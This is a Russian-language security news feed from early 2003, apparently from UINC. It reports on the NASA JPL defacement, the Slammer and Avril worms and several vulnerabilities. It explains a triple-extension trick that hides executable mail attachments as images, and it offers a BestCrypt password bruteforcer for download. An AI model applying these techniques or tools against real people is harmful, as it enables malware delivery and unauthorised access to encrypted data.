В прошедшие выходные сайты американского космического агентства подверглись хакерской атаке. По данным британской компании Mi2g, атака была нацелена на девять серверов, установленных в Лаборатории реактивного движения NASA (JPL). Эти серверы управляли работой веб-сайта Лаборатории, на главной странице которого хакеры разместили политические воззвания о недопустимости войны против Ирака. По данным Mi2g, все серверы работали под управлением ОС Sun Solaris. Атака на серверы JPL началась в субботу в 14:00 по времени Тихоокеанского побережья США и продолжалась в течение полутора часов. Технический персонал Лаборатории быстро узнал об атаке и принял необходимые меры. Однако ликвидация последствий атаки заняла около пяти часов, в течение которых сайт JPL был недоступен. По мнению экспертов, взлом сайта JPL никак не связан с катастрофой шаттла Columbia. Он нес исключительно политическую нагрузку. Позже представитель NASA Брайан Данбар подтвердил информацию о взломе, но отказался сообщить технические подробности. Кто взломал сайт JPL также пока неизвестно. В Mi2g на основе информации в различных хакерских форумах и конференциях подозревают во взломе группу хакеров Trippin Smurfs. Одновременно в NASA сообщили, что основной сайт американского космического агентства не подвергался атакам хакеров. Некоторые странности в его работе объясняются действиями администраторов, которые изменили конфигурацию серверов для обработки большего числа запросов. Это было необходимо из-за резко возросшей нагрузки на сайт NASA после катастрофы шаттла Columbia. Источник - http://www.compulenta.ru
4/02/2003 11:28 Очередной троян снова использует дыры в Outlook Express.
Компания MessageLabs сообщает о появлении новой троянской программы, использующей особенности почтового клиента Outlook Express. В течение двух дней 25 и 26 января фильтры MessageLabs перехватили около 3000 заражённых сообщений. Новый троян был назван W32/Sadhound. Для маскировки троян использует особенности механизма обработки заголовков электронных писем в Outlook Express. Определение типа вложенного файла происходит там вовсе не так прямолинейно, как должно было бы. Пока у файла только одно расширение, Outlook Express работает правильно. Но если файлу дать сразу три расширения, почтовая программа отреагирует весьма странным образом. Первое расширение она покажет пользователю, по третьему подберёт иконку файла, а второе расширение использует, для того чтобы определить, какой программой открывать данный файл. Если в качестве первого и третьего расширения указать .jpg, а в качестве второго - .exe, у пользователя не возникнет никаких сомнений в том, что перед ним картинка. Однако при попытке открыть вложение, Outlook Express запустит его, так как второе расширение, по мнению программы, свидетельствует, что это исполнимый файл. Если в письмо будет вложен код, запускающий троян при чтении письма, заразить систему становится совсем просто. Таким способом иногда удаётся обмануть не только пользователей, но и многие программы, например, почтовые фильтры, сортирующие файлы по расширению. Как правило, антивирусные фильтры блокируют исполняемые файлы, но пропускают картинки или архивы. Большинство из них ничего не знают о замысловатом способе определения типа файла, которым пользуется Outlook Express, и обращают внимание только на последнее расширение. Источник - http://www.compulenta.ru
4/02/2003 11:04 Safari станет единственным выбором для пользователей Маков?
Как обнаружил max с сайта slashzone.ru, на сайте News.com cообщается, что с выходом нового браузера Safari владельцы компьютеров Макинтош могут потерять возможность пользоваться другими альтернативными пакетами для работы в сети Интернет. В частности, руководство компании Opera уже выразило сомнения по поводу необходимости разработки новых версий своего браузера для платформы MacOS. Дело в том, что в настоящее время компания Apple делает упор именно на Safari – браузер, основанный на измененных библиотеках KHTML и KJS. И в том случае, если планы Apple осуществятся, сторонние разработчики браузеров фактически потеряют интерес к платформе MacOS. Так, как уже отмечалось выше, руководство Opera высказывает серьезные сомнения относительно дальнейшей поддержки платформы Макинтош, недоволен и новой политикой Apple Майк Пинкертон – один из разработчиков браузера Chimera на движке Gecko. Стоит также отметить, что Safari во многих аспектах напоминает браузер Opera: оба программных пакета имеют схожий интерфейс и высокую скорость работы. Подробности - http://news.com.com/2100-1001-982314.html
4/02/2003 10:49 Протоколы RADIUS и TACACS+: сравнение и принципы функционирования.
Сайт opennet.ru сообщает о статье, посвящённой описанию протоколов и сравнению Radius и Tacacs. Вся статья делится на две глобальные части: Первая часть написана в 1999 году, и содержат информацию по протоколам и их реализациям на тот период с небольшими модификациями, сделанными недавно. Вторая часть свежая и содержит информацию о конкретных реализациях RADIUS модулей, входящего в комплект системы LANBilling, которых на сегодняшний день 2 - активный и пассивный. Особо радует то. что статья написана на русском языке. Статья - http://www.lanbilling.ru/radius_tacacs.html
4/02/2003 10:24 Вышла новая версия chkrootkit - 0.39a.
Вышла новая версия chkrootkit - утилиты, предназначенной для поиска руткитов - программных закладок внедряемых в *nix-ОС. Основные исправления и дополнения: добавлена поддержка ОС Solaris, HPUX, обновлённый Adore LKM-тест, пофиксен баг для RedHat 8.0, добавленно более полное обнаружение Slapperа и др. О новости стало известно от Tiger с сайта linux.org.ru. Доступен - http://ru.chkrootkit.com/
4/02/2003 09:46 Протокол обещает ускорить веб-сервисы.
Протокол, разработанный профессором Школы информационных наук и технологии при Университете штата Пенсильвания Цзюнхунь Паком (Jonghun Park), основан на алгоритме, который позволяет применять вместо последовательных методов обработки запросов параллельные. Это повышает эффективность использования общих ресурсов через интернет. Новый протокол называется Order-based Deadlock Prevention Protocol with Parallel Requests. Специалисты по вычислительной технике много лет предлагают разнообразные протоколы, повышающие эффективность работы распределенных вычислительных систем, но Пак утверждает, что в приложениях, критичных к времени, его метод работает лучше. Сейчас общеупотребительным в этих случаях, по его словам, является протокол Order-based Deadlock Prevention Protocol. Хотя производительность, обеспечиваемая новым протоколом, впечатляет, аналитики отмечают, что развитие веб-сервисов и коллективных вычислений в интернете сдерживается другими проблемами, которые нужно решать в первую очередь. «Сейчас развитие веб-сервисов, по-моему, упирается в проблемы надежности и безопасности, — говорит аналитик RedMonk Стивен Огрейди (Stephen O'Grady). — После того как они будут решены, можно будет заняться такими вещами, которые помогут повысить производительность, в том числе этим протоколом». Подробности - http://www.zdnet.ru/?ID=295375
4/02/2003 09:28 Программистам запретили использовать созвучные с иностранными названия .
Сменить торговую марку компьютерной программы из-за того, что она на слух воспринимается так же, как бренд иностранной фирмы, обязало российских производителей Министерство по антимонопольной политике и поддержке предпринимательства РФ. Как сообщили представители МАП России, ЗАО “Русь”, Н.П. “Клуб капитал” и ООО “Информационный Центр” продают в России компьютерную программу “Система кадрового документооборота и управления персоналом Orakl-Кадры”. Одновременно на отечественном рынке уже с 1998 года работает иностранная компания Oracle Corporation, которая производит похожую прикладную программную систему “Oracle Управление персоналом”, предназначенную для организации работы службы кадров современного предприятия. И этой фирме принадлежат исключительные права на словесный товарный знак “Oracle”. А товарный знак российской фирмы на слух совпадает с уже зарегистрированным брендом. Интересно, что по-хорошему, то есть по просьбе конкурентов, российские компании отказались изменить название. Владельцам знака ничего не осталось, как попросить о защите своих интересов министерство. Специалисты МАП признали, что товарный знак был использован незаконно, и предписали в течение месяца прекратить нарушение антимонопольного законодательства. Источник - http://www.cnews.ru
3/02/2003 21:41 Приносим свои извинения!
Администрация сервера и команда UINC приносит извинения посетителям нашего сервера в связи с неудобствами, связанными с неработоспособностью форума нашего сайта. Они были связаны с техническими проблемами сервера и в настоящий момент устранены. Несмотря на это, смеем заметить, что новости мы выпускали почти без пропусков. C уважением - http://www.uinc.ru
3/02/2003 20:14 Архив новостей UINC за прошедший год.
Скачать архив наших новостей за прошедший год можно здесь: Для Пингвинистов: http://www.uinc.ru/scripts/load.cgi?news/archive/news_2002.tgz Для Выньдовозов: http://www.uinc.ru/scripts/load.cgi?news/archive/news_2002.zip
3/02/2003 19:54 Новая программа на сервере: UiNC BestCrypt Bruteforcer v1.0
Программа для подбора пароля к дискам, созданным программой BestCrypt, по словарю. Умеет подбирать пароли к Hidden контейнерам. Скачать здесь: http://www.uinc.ru/scripts/load.cgi?files/corbio/BestCrypt_Bruteforcer.zip
3/02/2003 12:52 В Южной Корее хотят засудить Microsoft из-за Slammer.
Компании Microsoft грозит очередное судебное разбирательство. Южнокорейская общественная организация "Народное движение за всеобщую демократию" (PSPD) объявила о том, что она планирует подать групповой иск против Microsoft. По мнению представителей PSPD, Microsoft должна понести ответственность за эпидемию, вызванную интернет-червем SQL Slammer. От вируса SQL Slammer, поражающего серверы под управлением Microsoft SQL Server 2000, больше всего пострадали машины, размещенные в Южной Корее. Представители PSPD заявляют, что согласно новому южнокорейскому закону о "надежности продукции" производитель несет ответственность за ущерб, вызванный недостатками в его продукции. К настоящему времени уже более трех тысяч клиентов компаний, предоставляющих широкополосный доступ в интернет, изъявили желание поставить свои подписи под групповым иском любого характера против Microsoft. Эксперты полагают, что у PSPD практически нет шансов выиграть этот иск, поскольку Microsoft выпустила "заплатку", устраняющую уязвимость в SQL Server 2000, через которую проникал Slammer, еще летом 2002 года. Однако это не останавливает возмущенных корейцев. Несмотря на заявления Microsoft о том, что они предупреждали об этой уязвимости по электронной почте, а также разными другими способами, представители PSPD не считают, что компания полностью исполнила свои обязанности перед клиентами, поскольку она располагает полным списком зарегистрированных пользователей SQL Server. На этой неделе руководство PSPD планирует встретиться с группой юристов, чтобы обсудить детали искового заявления. Подробности - http://www.compulenta.ru/2003/2/3/37289/
3/02/2003 10:51 Аналитики подсчитали ущерб от эпидемии червя Helkern.
Общий ущерб, понесенный мировыми компаниями в результате 5-дневной активности червя Helkern (Slammer), составил от 0,95 до 1,2 миллиарда долларов США, сообщает сайт CNET News.com со ссылкой на британскую аналитическую компанию Mi2g. Таким образом, Helkern оказался на 9-м месте в списке самых вредных программ по версии Mi2g. По сумме нанесенного ущерба он значительно отстал от таких вирусов как Code Red (ущерб - 2,6 миллиарда долларов), LoveLetter (8,8 миллиарда) и Klez (9 миллиардов). "Несмотря на весь шум вокруг червя Slammer, он не настолько опасен, как о нем думают. Если вы думаете, что 25 января на землю упало небо, то этого не было", - заявил главный администратор Mi2g. По словам представителя аналитической компании Computer Economics, на ликвидацию последствий эпидемии Helkern потребуется от 0,75 до 1 миллиарда долларов. Многие эксперты отмечают, что несмотря на менее скромные масштабы эпидемии Helkern по сравнению с Code Red, истинный ущерб от нового червя может быть значительно серьезнее. "Этот червь делал то, с чем мы прежде не сталкивались. Люди не могли пользоваться цифровыми телефонными линиями, были отменены полеты авиации, а в банкоматах нельзя было получить наличность", - сообщил руководитель аналитического центра IT-ISAC Питер Аллор. Источник - http://news.com.com/2100-1001-982955.html
3/02/2003 09:35 Ежемесячный вирусный обзор ЗАО "ДиалогНаука" - январь 2003.
Служба мониторинга вирусной активности ЗАО "ДиалогНаука" опубликовала анализ вирусной ситуации за январь 2003г. Едва успев прийти в себя после декабрьского затишья (которое можно назвать таковым лишь на фоне гораздо более неспокойных в вирусном отношении предыдущих месяцев), компьютерный мир с самых первых дней января 2003 года оказался ввергнутым в пучину целой серии эпидемий почтовых червей. К тем, которые остались в наследство с 2002 года - Win32.HLLM.Klez.4, Win32.HLLM.Yaha.64000, Win32.HLLM.SirCam.1, Win32.HLLM.Bugbear, Win32.HLLM.Seoul - прибавился новый клон семейства Yaha - Win32.HLLM.Yaha.1, который лишний раз продемонстрировал, что группа индийских хакеров еще долго будет будоражить своими вредоносными творениями не только пакистанские интернет-сайты, но и весь мир. Но стоило закончиться новогодним и рождественским праздникам, как в считанные дни несколько эпидемий почтовых червей захлестнули Интернет. Это, прежде всего, две модификации семейства Avril - Win32.HLLM.Avril.1 и Win32.HLLM.Avril.2 (по классификации других антивирусных компаний - Lirva). Второй из них, появление которого было объявлено в первой версии червя, всего лишь за сутки вышел на первую позицию в вирусной статистике Рунета, опередив Win32.HLLM.Klez.4. При этом Avril.2 не только распространялся сам по себе, но и старался закачать и запустить на пораженном компьютере программу-люк, предоставляющую возможность удаленного администрирования компьютера-жертвы. Более подробный анализ - http://www.dials.ru/inf/news.php?id=371
2/02/2003 14:12 Кинуть в Гейтса торт не удалось.
Известному бельгийскому "тортометателю" Ноэлю Годэну не удалось повторить свой "подвиг" - когда ему удалось запустить в лицо Биллу Гейтсу яблочный торт во время предыдущего визита главы Microsoft в Брюссель. Билл Гейтс прибыл в Брюссель на слушания комиссии Евросоюза по поводу системы онлайновой аутентификации Passport .NET, которая, по мнению некоторых специалистов, противоречит европейскому законодательству в области обеспечения права на неприкосновенность личной жизни. Годэн приготовил три торта с кремом в качестве "подарка" Гейтсу, однако бдительные бельгийские полицейские на этот раз не дали шутнику "доставить" свой подарок "по адресу". Годэн пытался убедить полицейских в том, что в трех коробках, находящиxся в его автомобиле, ничего нет, однако полицейские не позволили "тортометателю" даже выйти из машины. По словам Годэна, "мистер Доллар", как он называет Гейтса - это желанная мишень для всех "кулинарных террористов". Годэн выразил удовлетворение тем фактом, что ему удалось хоть раз реализовать свою идею. Источник - http://www.reuters.com/
2/02/2003 13:37 Готовится выпуск NetBSD 1.6.1.
NetBSD Project объявил о начале процесса подготовки выпуска новой версии ОС NetBSD - 1.6.1. Фактически эта версия просто включает в себя все патчи, появившиеся с момента выхода версии 1.6, поскольку пользователи этой версии выразили неудовольствие качеством и багами этой версии. Подробности - http://www.netbsd.org/releng/releng-1.6.html
2/02/2003 12:54 Обзор мини-дистрибутивов Linux загружаемых прямо с CD-ROM.
На сайте www.opennet.ru опубликована ссылка на страницу "CD-based Linux Distributions and Live Linux CDs", на которой можно найти описание существующих Linux-дистрибутивов, работающих прямо с CD-ROM. В обзоре участвуют: ByzantineOS, Cool Linux, DemoLinux, Dynebolic GNU/Linux, Eagle Linux, Freeduc, FreeLoader Linux, Knoppix, LNX-BBC, Lonix, MLD Live Linux, MoviX, SuSE Live-Eval, Ututo и Virtual-Linux. Ссылка - http://www.opennet.ru/opennews/art.shtml?num=2048
2/02/2003 12:37 Windows XP для Linux.
На сайте softerra.ru опубликована статья-обзор Сергея Яремчука с Украины, посвящённая оконному менеджеру Xpde, имитирующего в ОС Linux внешний вид и поведение (имеетеся в виду интерфейс) Windows XP. Домашняя страница проекта www.xpde.com. Обращает на себя внимание то, что пользователю предоставленная возможность выбора языка интерфейса, среди которых нашлось место и русскому и украинскому. На сайте доступен также форум и несколько статей помогающих разобраться с настройкой. Дистрибутив в архиве занимает 5.77 Мб. Установка заключается в его распаковке, в результате чего в домашнем каталоге пользователя образуется два подкаталога xpde и .xpde, а также файл .xinitrcXPDE. Более подробно - http://www.softerra.ru/freeos/23582/
2/02/2003 11:18 Cyclone - безопасный диалект С.
Фирма AT&T Labs Research представила на днях Cyclone - язык программирования, основанный на Си, в котором сделан акцент на безопасность при разработке приложений: проводится контроль безопасности на возможные переполнения буфера, опасные указатели, возможные атаки форматной строки и т.д. Высокоуровневые языки, ориентированные на безопасность, такие, как Java, Scheme или ML, также позволяют писать безопасные приложения, однако не обладают такими мощными средствами Си, как контроль над формой управления данными, управление памятью (именно по этой причине многие ран-таймовые системы пишут именно на Си). Кроме того, портирование Си-программ, а также взаимодействие с Си-библиотеками - довольно нетривиальная и очень сложная задача. Целью создания Cyclone как раз и было предоставление программистам возможности низкоуровневого контроля и высокой производительности Си с дополнительными проверками на безопасность исходного кода, а также лёгкое портирование с Си и упрощение взаимодействия с Си-библиотеками. Подробности - http://www.research.att.com/projects/cyclone/
2/02/2003 10:35 4 февраля открывается Международный форум "Технологии безопасности".
Как мы сообщали ранее, с 4 по 7 февраля на ВВЦ (пав. 57) будет проходить крупнейшее мероприятие в области безопасности - Международный Форум "Технологии безопасности". За восемь лет своего существования форум стал событием номер один в сфере обеспечения общественной и коммерческой безопасности в нашей стране, а также одним из наиболее значимых в Европе. Ежегодно форум привлекает несколько десятков тысяч специалистов в области безопасности из России, стран СНГ, Балтии и Восточной Европы. Форум "Технологии безопасности" - это важнейший инструмент в деле формирования единой эффективной системы общественной безопасности России на основе взаимодействия государственной правоохранительной системы, общественных организаций и субъектов современного рынка безопасности. В 2003 году в 8 Международном форуме "Технологии безопасности" принимают участие более 350 отечественных и зарубежных производителей и поставщиков технических средств, оснащения и услуг в области безопасности, представителей органов законодательной и исполнительной власти, руководителей предпринимательских объединений, союзов и ассоциаций негосударственных структур безопасности, частных охранных предприятий и служб безопасности. Общая площадь выставочной экспозиции – 13,5 тыс. м². В 2003 году на своих стендах форума будут представлены новейшие разработки технических средств и систем в области безопасности, среди них: многоканальная система видео-аудио записи Phobos, термосенсорная технология распознавания отпечатка пальца Sweepee, противокражный комплекс систем видеоконтроля Checkpoint-Meto, программный комплекс sPARK для управления автоматизированными парковками, система видеонаблюдения и аудиоконтроля SivineyaT DV, приемник для обнаружения работающих подслушивающих устройств SEL SP-81 "Оракул" и др. Подробности - http://www.tbforum.ru
2/02/2003 10:06 Microsoft уступает требованиям ЕС.
Как сообщили представители Европейской Комиссии в Брюсселе, компьютерный гигант Microsoft согласился существенно изменить программу Password, обрабатывающую важные для пользователя данные. Отныне пользователи получат больше информации о том, как используются их личные данные, а также будут иметь больший контроль над этим процессом. Нынешнее соглашение разрешит спор о том, нарушает ли система паролей доступа к интернету фирмы Microsoft европейские законы о защите личности. Персональные данные, такие как пароли и номера кредитных карточек, хранятся в системе и автоматически передаются операторам интернет╜сайтов, когда пользователи подключаются к ним. Однако сторонники сохранения конфиденциальности сомневаются, достаточно ли безопасна система Microsoft, они обвиняют компанию в сокрытии от пользователей всей информации о том, как могут использоваться их персональные данные. Источник - http://www.internet.ru
2/02/2003 00:25 Обновления в kerberos для Red Hat.
Компания Red Hat (производитель одноименного Linux дистрибутива) выпустила заплатку для реализации протокола kerberos после обнаружения уязвимости в kerberos ftp клиенте. Уязвимость выражалась в следующем: при попытке передачи файла, имя которого начиналось с символа "|", ftp клиент воспринимал имя файла как команду и исполнял ее вызовом system(). Источник - http://lwn.net/Articles/21607/
1/02/2003 15:09 Статья "Расследования кибератак – взгляд из ФБР".
На сайте crime-research.org появилась статья, представляющая взгляд ФБР на проблему расследования кибератак, основной целью которой является, конечно же, установление источника атаки и соответствующее наказание. Специалисты ФБР США в области расследования киберпреступлений, предоставляют исчерпывающую информацию о возможных путях вторжения в программное обеспечение. Однако зачастую эта информация не отвечает на вопрос: откуда и кем было совершено киберпреступление? «Возможность раскрытия преступления такого рода, маловероятна», - заявил Ken Dunham, эксперт iDefense Inc., фирмы, занимающейся онлайновой защитой. “У нас нет прямых доказательств”. Большинство квалифицированных специалистов полагают, что программирование для Internet-червя, основанного на программном коде, разместил на Website несколько месяцев назад известный британский компьютерный исследователь David Litchfield. Позже код программирования был изменён хакером, известным в китайском хакерском андеграунде под именем «Lion». Вышеупомянутый изменённый код был размещён на онлайновской странице китайских хакеров «Honker», организации, участвующей в стычках между американскими и китайскими хакерами. В 2001 году этот вирус проник в базу данных ВВС США, что вызвало вынужденную посадку американского военного самолёта-невидимки. Как утверждают эксперты, “невозможно сказать наверняка запустили ли этот вирус именно китайские хакеры”. “Существуют несомненные связи”, - говорит Нил Мета (Neel Mehta), который изучал систему программирования для Atlanta-based Internet Security System Inc. “Это более, чем случайное совпадение, тем не менее, я не стану утверждать, что это именно Honker”. В отличие от способов вторжения в программное обеспечение, которые использовались в предыдущих Internet-атаках, последний программный код сокращён по объёму и не содержит информации о прозвище и о местонахождении хакера. Используемый метод передачи вируса позволил хакеру с лёгкостью замести следы. «Это всё пустые слова», - заявляет Марк Майфрет (Marc Maiffret), представитель Eye Digital Security Inc. “Достаточно было простого вторжения, чтобы вирус начал размножаться”. Схема разрушительного вируса “Love Bug“, который был распространён в мае 2000 года филиппинским студентом, в своём программном коде включала информацию о его приятелях по университету, в котором он учился. Эти ошибки позволили спецагентам ФБР выйти на его след в течение суток. Подробнее - http://www.crime-research.org/news/2003/02/0102.htm
1/02/2003 14:01 Как бороться со спамом на почтовых серверах.
Русский сайт, посвящённый открытым системам opennet.ru, сообщает о выходе в Интернет переводной статьи, описывающей что такое спам и как с ним можно бороться на почтовых серверах и в клиентских программах. Статья - http://www.linuxfocus.org/Russian/January2003/article279.shtml
1/02/2003 13:37 Ещё один анализ распространения червя Sapphire.
Группа исследователей компьютерной безопасности из Silicon Defense, UC Berkeley, CAIDA провела исследования темпов распространения червя Sapphire (в терминологии eEye, другие названия - Slammer и Elkern), поразившего в прошлую субботу множество серверов и сетей в Интернет. Для широкомасштабного распространения червю понадобилось всего 10 минут, что сделало его самым быстрораспространяющимся червем на настоящий момент. На каждом этапе рапространения количество заражённых червём хостов удваивалось каждые 8.5 секунд! Пик заражения был достигнут через 3 минуты после начала распространения - на этом этапе червём сканировалось около 55 миллионов IP-адресов в секунду! Было заражено около 75.000 серверов. Высочайшая скорость распространения была достигнута благодаря самому механизму распространения червя - использование протокола UDP, не требующего установления соединения и подтверждения от заражённой машины. Каждая копия червя сканировала свои жертвы со скоростью, которая ограничивалась только мощностью заражённого сервера и полосой пропускания канала. Эксперты также заметили 2 ошибки в коде генератора адресов случайного сканирования. Также подчёркивается, что приведённые данные пока носят только предварительный характер. Подробности - http://www.cs.berkeley.edu/~nweaver/sapphire/
1/02/2003 12:31 Установка хотфикса к Win2k приводит к сбою в системе.
На сайте www.bugtraq.ru cообщается, что, по сведениям Константина Леонтьева, рекомендуемое обновление Microsoft Pre-SP4 Q329251 к Win2k от 23.01.2003, доступное с сайта Windows Update, приводит к сбоям системы. По идее, данное обновление предназначено для повышения производительности NAT. На практике же его установка приводит к 20-минутной задержке при запуске RRAS, произвольным обрывам связи и, наконец, к возможному выпадению в синий экран в результате ошибки в ipnat.sys. Пока неясно, на каких конфигурациях проявляются такие симптомы, но на всякий случай лучше не торопиться с установкой этого хотфикса. Описание проблемы - http://www.bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=16&m=69495
1/02/2003 11:49 Червь Avril.B стал самым распространенным январским вирусом.
Интернет-червь Avril.B (другое название - Lirva.B) стал самой распространенной вредоносной компьютерной программой по итогам первого месяца 2003 года, сообщает производитель антивирусного программного обеспечения Sophos. В десятке самых "популярных" вирусов января Avril.B оказался на первом месте. Доля сообщений о пораженных этим червем компьютеров составила 16,8 процента от общего числа обнаруженных вредоносных программ. Второе место в вирусном рейтинге заняла другая версия Avril - Avril.A (12,4 процента). Тройку лидеров замкнул Klez.H (12,1 процента), впервые обнаруженный еще весной прошлого года. Доля распространенности еще одной вирусной новинки этого года, червя Sobig, по итогам января оказалась почти в 2 раза ниже, чем у лидеров и составила 6,1 процента. В число других наиболее распространенных вредоносных программ попали черви Yaha.K, Bugbear.A, Yaha.E, Elkern.C. Всего в течение января специалисты Sophos обнаружили 521 вредоносную программу. Помимо вирусного "хит-парада" компания Sophos представила январский рейтинг вирусных мистификаций, лидером которого оказалось сообщение с ложным предупреждением о вредном воздействии файла JDBGMGR.EXE. Первые сообщения такого рода появились в апреле 2002 года, однако на самом деле JDBGMGR.EXE является обычной утилитой Windows. Доля мистификаций с упоминанием JDBGMGR.EXE составила 19,7 процента. К другим распространенным в январе мистификациям антивирусные исследователи отнесли письма с темами WTC Survivor, Budweiser frogs screensaver, Meninas da Playboy, Bonsai kitten. Подробности - http://www.sophos.com/pressoffice/pressrel/uk/20030131topten.html
1/02/2003 11:20 Установлен уровень активности современных хакеров.
Забавный эксперимент решила провести компания PSINet Europe. Она измерила современный уровень хакерской активности в Интернете. PSINet Europe установила анонимный сервер-"чучело" Internet Data Centre в Амстердаме, не содержащий базы данных и не имеющий общественного профиля. За первые 24 часа покушения на "чучело" были зафиксированы 467 раз. В последующие три недели нападения совершались ежедневно. Всего за 21 день было зарегистрировано 626 злонамеренных атак. Причем, большая часть атак производилась с аккаунтов кабельных и широкополосных провайдеров. Стивен Скотт (Stephen Scott), управляющий PSINet Europe в Великобритании, сказал: "По идее, наш сервер-кукла находился в идеальной изоляции за стенами вычислительного центра, где его не должны были подцеплять, сканировать или атаковать. Вместо этого в первый же день после инсталляции мы зафиксировали почти 500 попыток проникновения". Примечательно, что большинство атак исходили из США и Западной Европы - из Германии, Италии, Нидерландов и Великобритании, хотя, как правило, со словом "хакер" возникают ассоциации с Россией, Болгарией и Румынией. Результаты теста PSINet Europe подтверждаются цифрами, полученными от Gartner Group, которая сообщила, что 90% брешей в защите связано с некорректной конфигурацией и неправильным администрированием сетей. Первоисточник - http://zdnet.com.com/2100-1105-982554.html
1/02/2003 09:45 Социальный портрет хакера.
В одном из банков Тулы в четверг со счета частного лица через интернет были сняты 19 тыс долларов. Как сообщили РИА "Новости" в УВД Тульской области, это не первый случай взлома банковских компьютерных сетей в Туле. Два года назад сотрудниками тульского УФСБ был задержан компьютерный хакер, сумевший взломать защиту Сбербанка. По словам заместителя начальника отдела по борьбе с преступлениями в сфере компьютерных технологий Игоря Полосина, в последнее время хакеры постепенно перемещают свои центры из столичных городов в провинцию. Так, за время существования отдела, созданного около года назад, его сотрудниками было заведено 272 уголовных дела по фактам незаконного доступа к информации и 2 по фактам разработки и запуска вирусных программ. По словам Полосина, социальный портрет хакера - молодой человек, в возрасте от 14 до 30 лет, чаще всего студент. Сотрудники отдела отмечают, что в последнее время уровень "мастерства" хакеров значительно вырос. Источник - http://www.rian.ru
1/02/2003 09:27 NASA подключает шаттлы и спутники к Интернету.
Спутники и космические корабли NASA скоро получат адреса в Интернете, сообщает BBC News. Для того, чтобы сделать связь с космическими кораблями удобнее и дешевле специалисты NASA рассматривают возможность использовать Интернет. Согласно проекту Omni(Operating Missions as a Node on the Internet), разрабатываемому в агентстве, выходить на связь с космическими кораблями можно будет при помощи стандартного броузера. Для того, чтобы испытать эту технологию, на борту шаттла Columbia установлен компьютер, работающий под управлением операционной системы Red Hat Linux, который должен поддерживать постоянную связь с Центром управления полетами им. Годдарда. За время пребывания шаттла на орбите, специалисты центра будут пытаться выйти с ним на связь более 140 раз. Источник - http://news.bbc.co.uk/2/hi/technology/2709875.stm
31/01/2003 12:41 ФСБ обезвредила высококвалифицированного хакера в Томской области.
Управлением ФСБ РФ по Томской области пресечена деятельность высококвалифицированного компьютерного взломщика, заполучившего в середине 2002 года несанкционированный доступ к корпоративным информационным системам ряда операторов сотовой и пейджинговой связи Томска и Новосибирска. В пресс-службе областного УФСБ сообщили в четверг, что хакер совершал противоправные действия, входя в интернет с домашнего (?!) компьютера. Как было установлено в ходе оперативно-розыскных мероприятий, злоумышленник с помощью специальных программ "взламывал" базы данных различных компаний и увеличивал собственные счета и счета своих знакомых за оплату услуг связи. Хакер также копировал информацию о клиентах компаний, а затем выгодно сбывал похищенную базу данных. Подробности - http://www.SecurityLab.ru/?ID=35691
31/01/2003 12:29 Провайдер не спешит раскрывать личность музыкального пирата.
Американский интернет-провайдер Verizon обратился в апелляционный суд с просьбой отменить недавнее судебное решение, согласно которому провайдер должен раскрыть личность одного из своих клиентов Американской ассоциации звукозаписывающих компаний (RIAA). RIAA намерена привлечь абонента Verizon к суду за активное скачивание музыки с помощью пиринговых сетей: по имеющимся данным тот скачивал до шестисот песен в день. По мнению юристов Verizon, такое решение является антиконституционным и ставит под угрозу конфиденциальность пользователей Сети. В качестве примера возможных злоупотреблений Verizon приводит реальный случай, когда защитники копирайта подали иск на ребенка, приняв выложенное им в интернете сочинение о Гарри Поттере за пиратскую копию фильма о юном волшебнике. Повторение подобных случаев недопустимо, считают в Verizon. Одновременно с подачей жалобы в апелляционный суд Verizon обратилась к вынесшему спорное решение судье Джону Бейтсу с просьбой отложить вступление решения в силу на время ведения слушаний по апелляции. RIAA, впрочем, тоже не собирается сдаваться и будет всячески противостоять Verizon во время слушаний в апелляционном суде. Источник - http://www.reuters.com
31/01/2003 12:13 В Японии зафиксированы всего десять случаев заражения червем SQL Slammer.
Президент японского подразделения Microsoft Синити Ата заявил, что интернет-червь SQL Slammer, эпидемия которого разразилась в интернете 25-26 января 2003 года, поразил серверы всего десяти японских компаний. По сравнению с многочисленными случаями заражения серверов в США, Китае, европейских странах и, в особенности, в Южной Корее, в Японии вирус SQL Slammer не получил широкого распространения. Как сообщило японское государственное агентство по содействию распространению информационных технологий IPA, по состоянию на шесть часов вечера 28 января в Японии были зарегистрированы три случая замедления траффика и один случай заражения. По словам Ата, 27 января 2003 года около двухсот корпоративных пользователей SQL Server 2000 отправили в Microsoft запросы относительно средств защиты от SQL Slammer, при этом зараженными оказались только серверы десяти компаний. Названия этих фирм не разглашаются. Остальные отправители запросов не пострадали от интернет-червя, поскольку системные администраторы своевременно устанавливали патчи от Microsoft. Как заявил Синити Ата, почти все проблемы, возникшие из-за вируса SQL Slammer, были решены к вечеру 27 января. Тем не менее, Ата призвал всех пользователей SQL Server 2000 к повышенной осторожности, поскольку в Сети могут появиться модифицированные версии этого интернет-червя. Источник - http://www.compulenta.ru
31/01/2003 10:26 Уязвимость в Locator Service.
Известный исследователь компьютерной безопасности из NGSSoftware (Великрбритания) Дэвид Личтфилд (David Litchfield) сообщил подробности уязвимости в RPC Locator Service для платформы Windows. Это было сделано Дэвидом после выпуска Microsoft бюллетеня по безопасности MS03-001 на прошлой неделе, в котором была рассмотрена также процедура применения патча от этой уязвимости. RPC Locator Service предназначен для содержания списка RPC-сервисов и соответствующих им серверов в локальной сети. Обычно подобный сервис запущен только на контроллерах доменов NetBIOS-сети. Суть уязвимости заключается в следующем. При просмотре допустимых RPC-сервисов в сети, Windows RPC-клиент соединяется сконтроллером домена через TCP-порты 139/445 (порты SMB) и просматривает сервисы/сервера при помощи "именованных каналов" локатора ("locator" named pipe). Из-за некорректного вызова системной функции wcscpy() у удалённого атакующего может возникнуть (если он постарается ;)) возможность переполнения буфера стека в процессе, обслуживающем Locator. Уязвимость обнаружена в ОС: Windows 2000/XP/NT. Также NGSSoftware выпущен сканер для проверки уязвимых серверов сети (запускается из командной строки). Дэвид сообщает, что им выпущен эксплоит, однако после событий прошлой недели Дэвид решил его не выкладывать для публичного использования (пока, по крайней мере). Напомним, что Литчфилд выразил крайнее неудовольствие тем, что в исходном коде вируса Slammer был использован код его эксплоита для MS SQL - в частности, были использованы те же адреса для импорта входных адресов функций GetProcAddress() и LoadLibraryA() в sqlsort.dll, также в секции .data sqlsort.dll и адреса, при помощи которых происходит перезапись сохранённого адреса возврата в стеке. Дэвид также заметил, что в отличие от его эксплоита, червь не вызывает удалённый шелл. Что касается оисанной уязвимости, она включена в сканер уязвимостей Typhon, выпускаемых и поддерживаемый NGSSoftware. Подробности - http://www.ngssoftware/rpclocator.html
31/01/2003 10:02 Выход SPIKE Proxy 1.4.7.
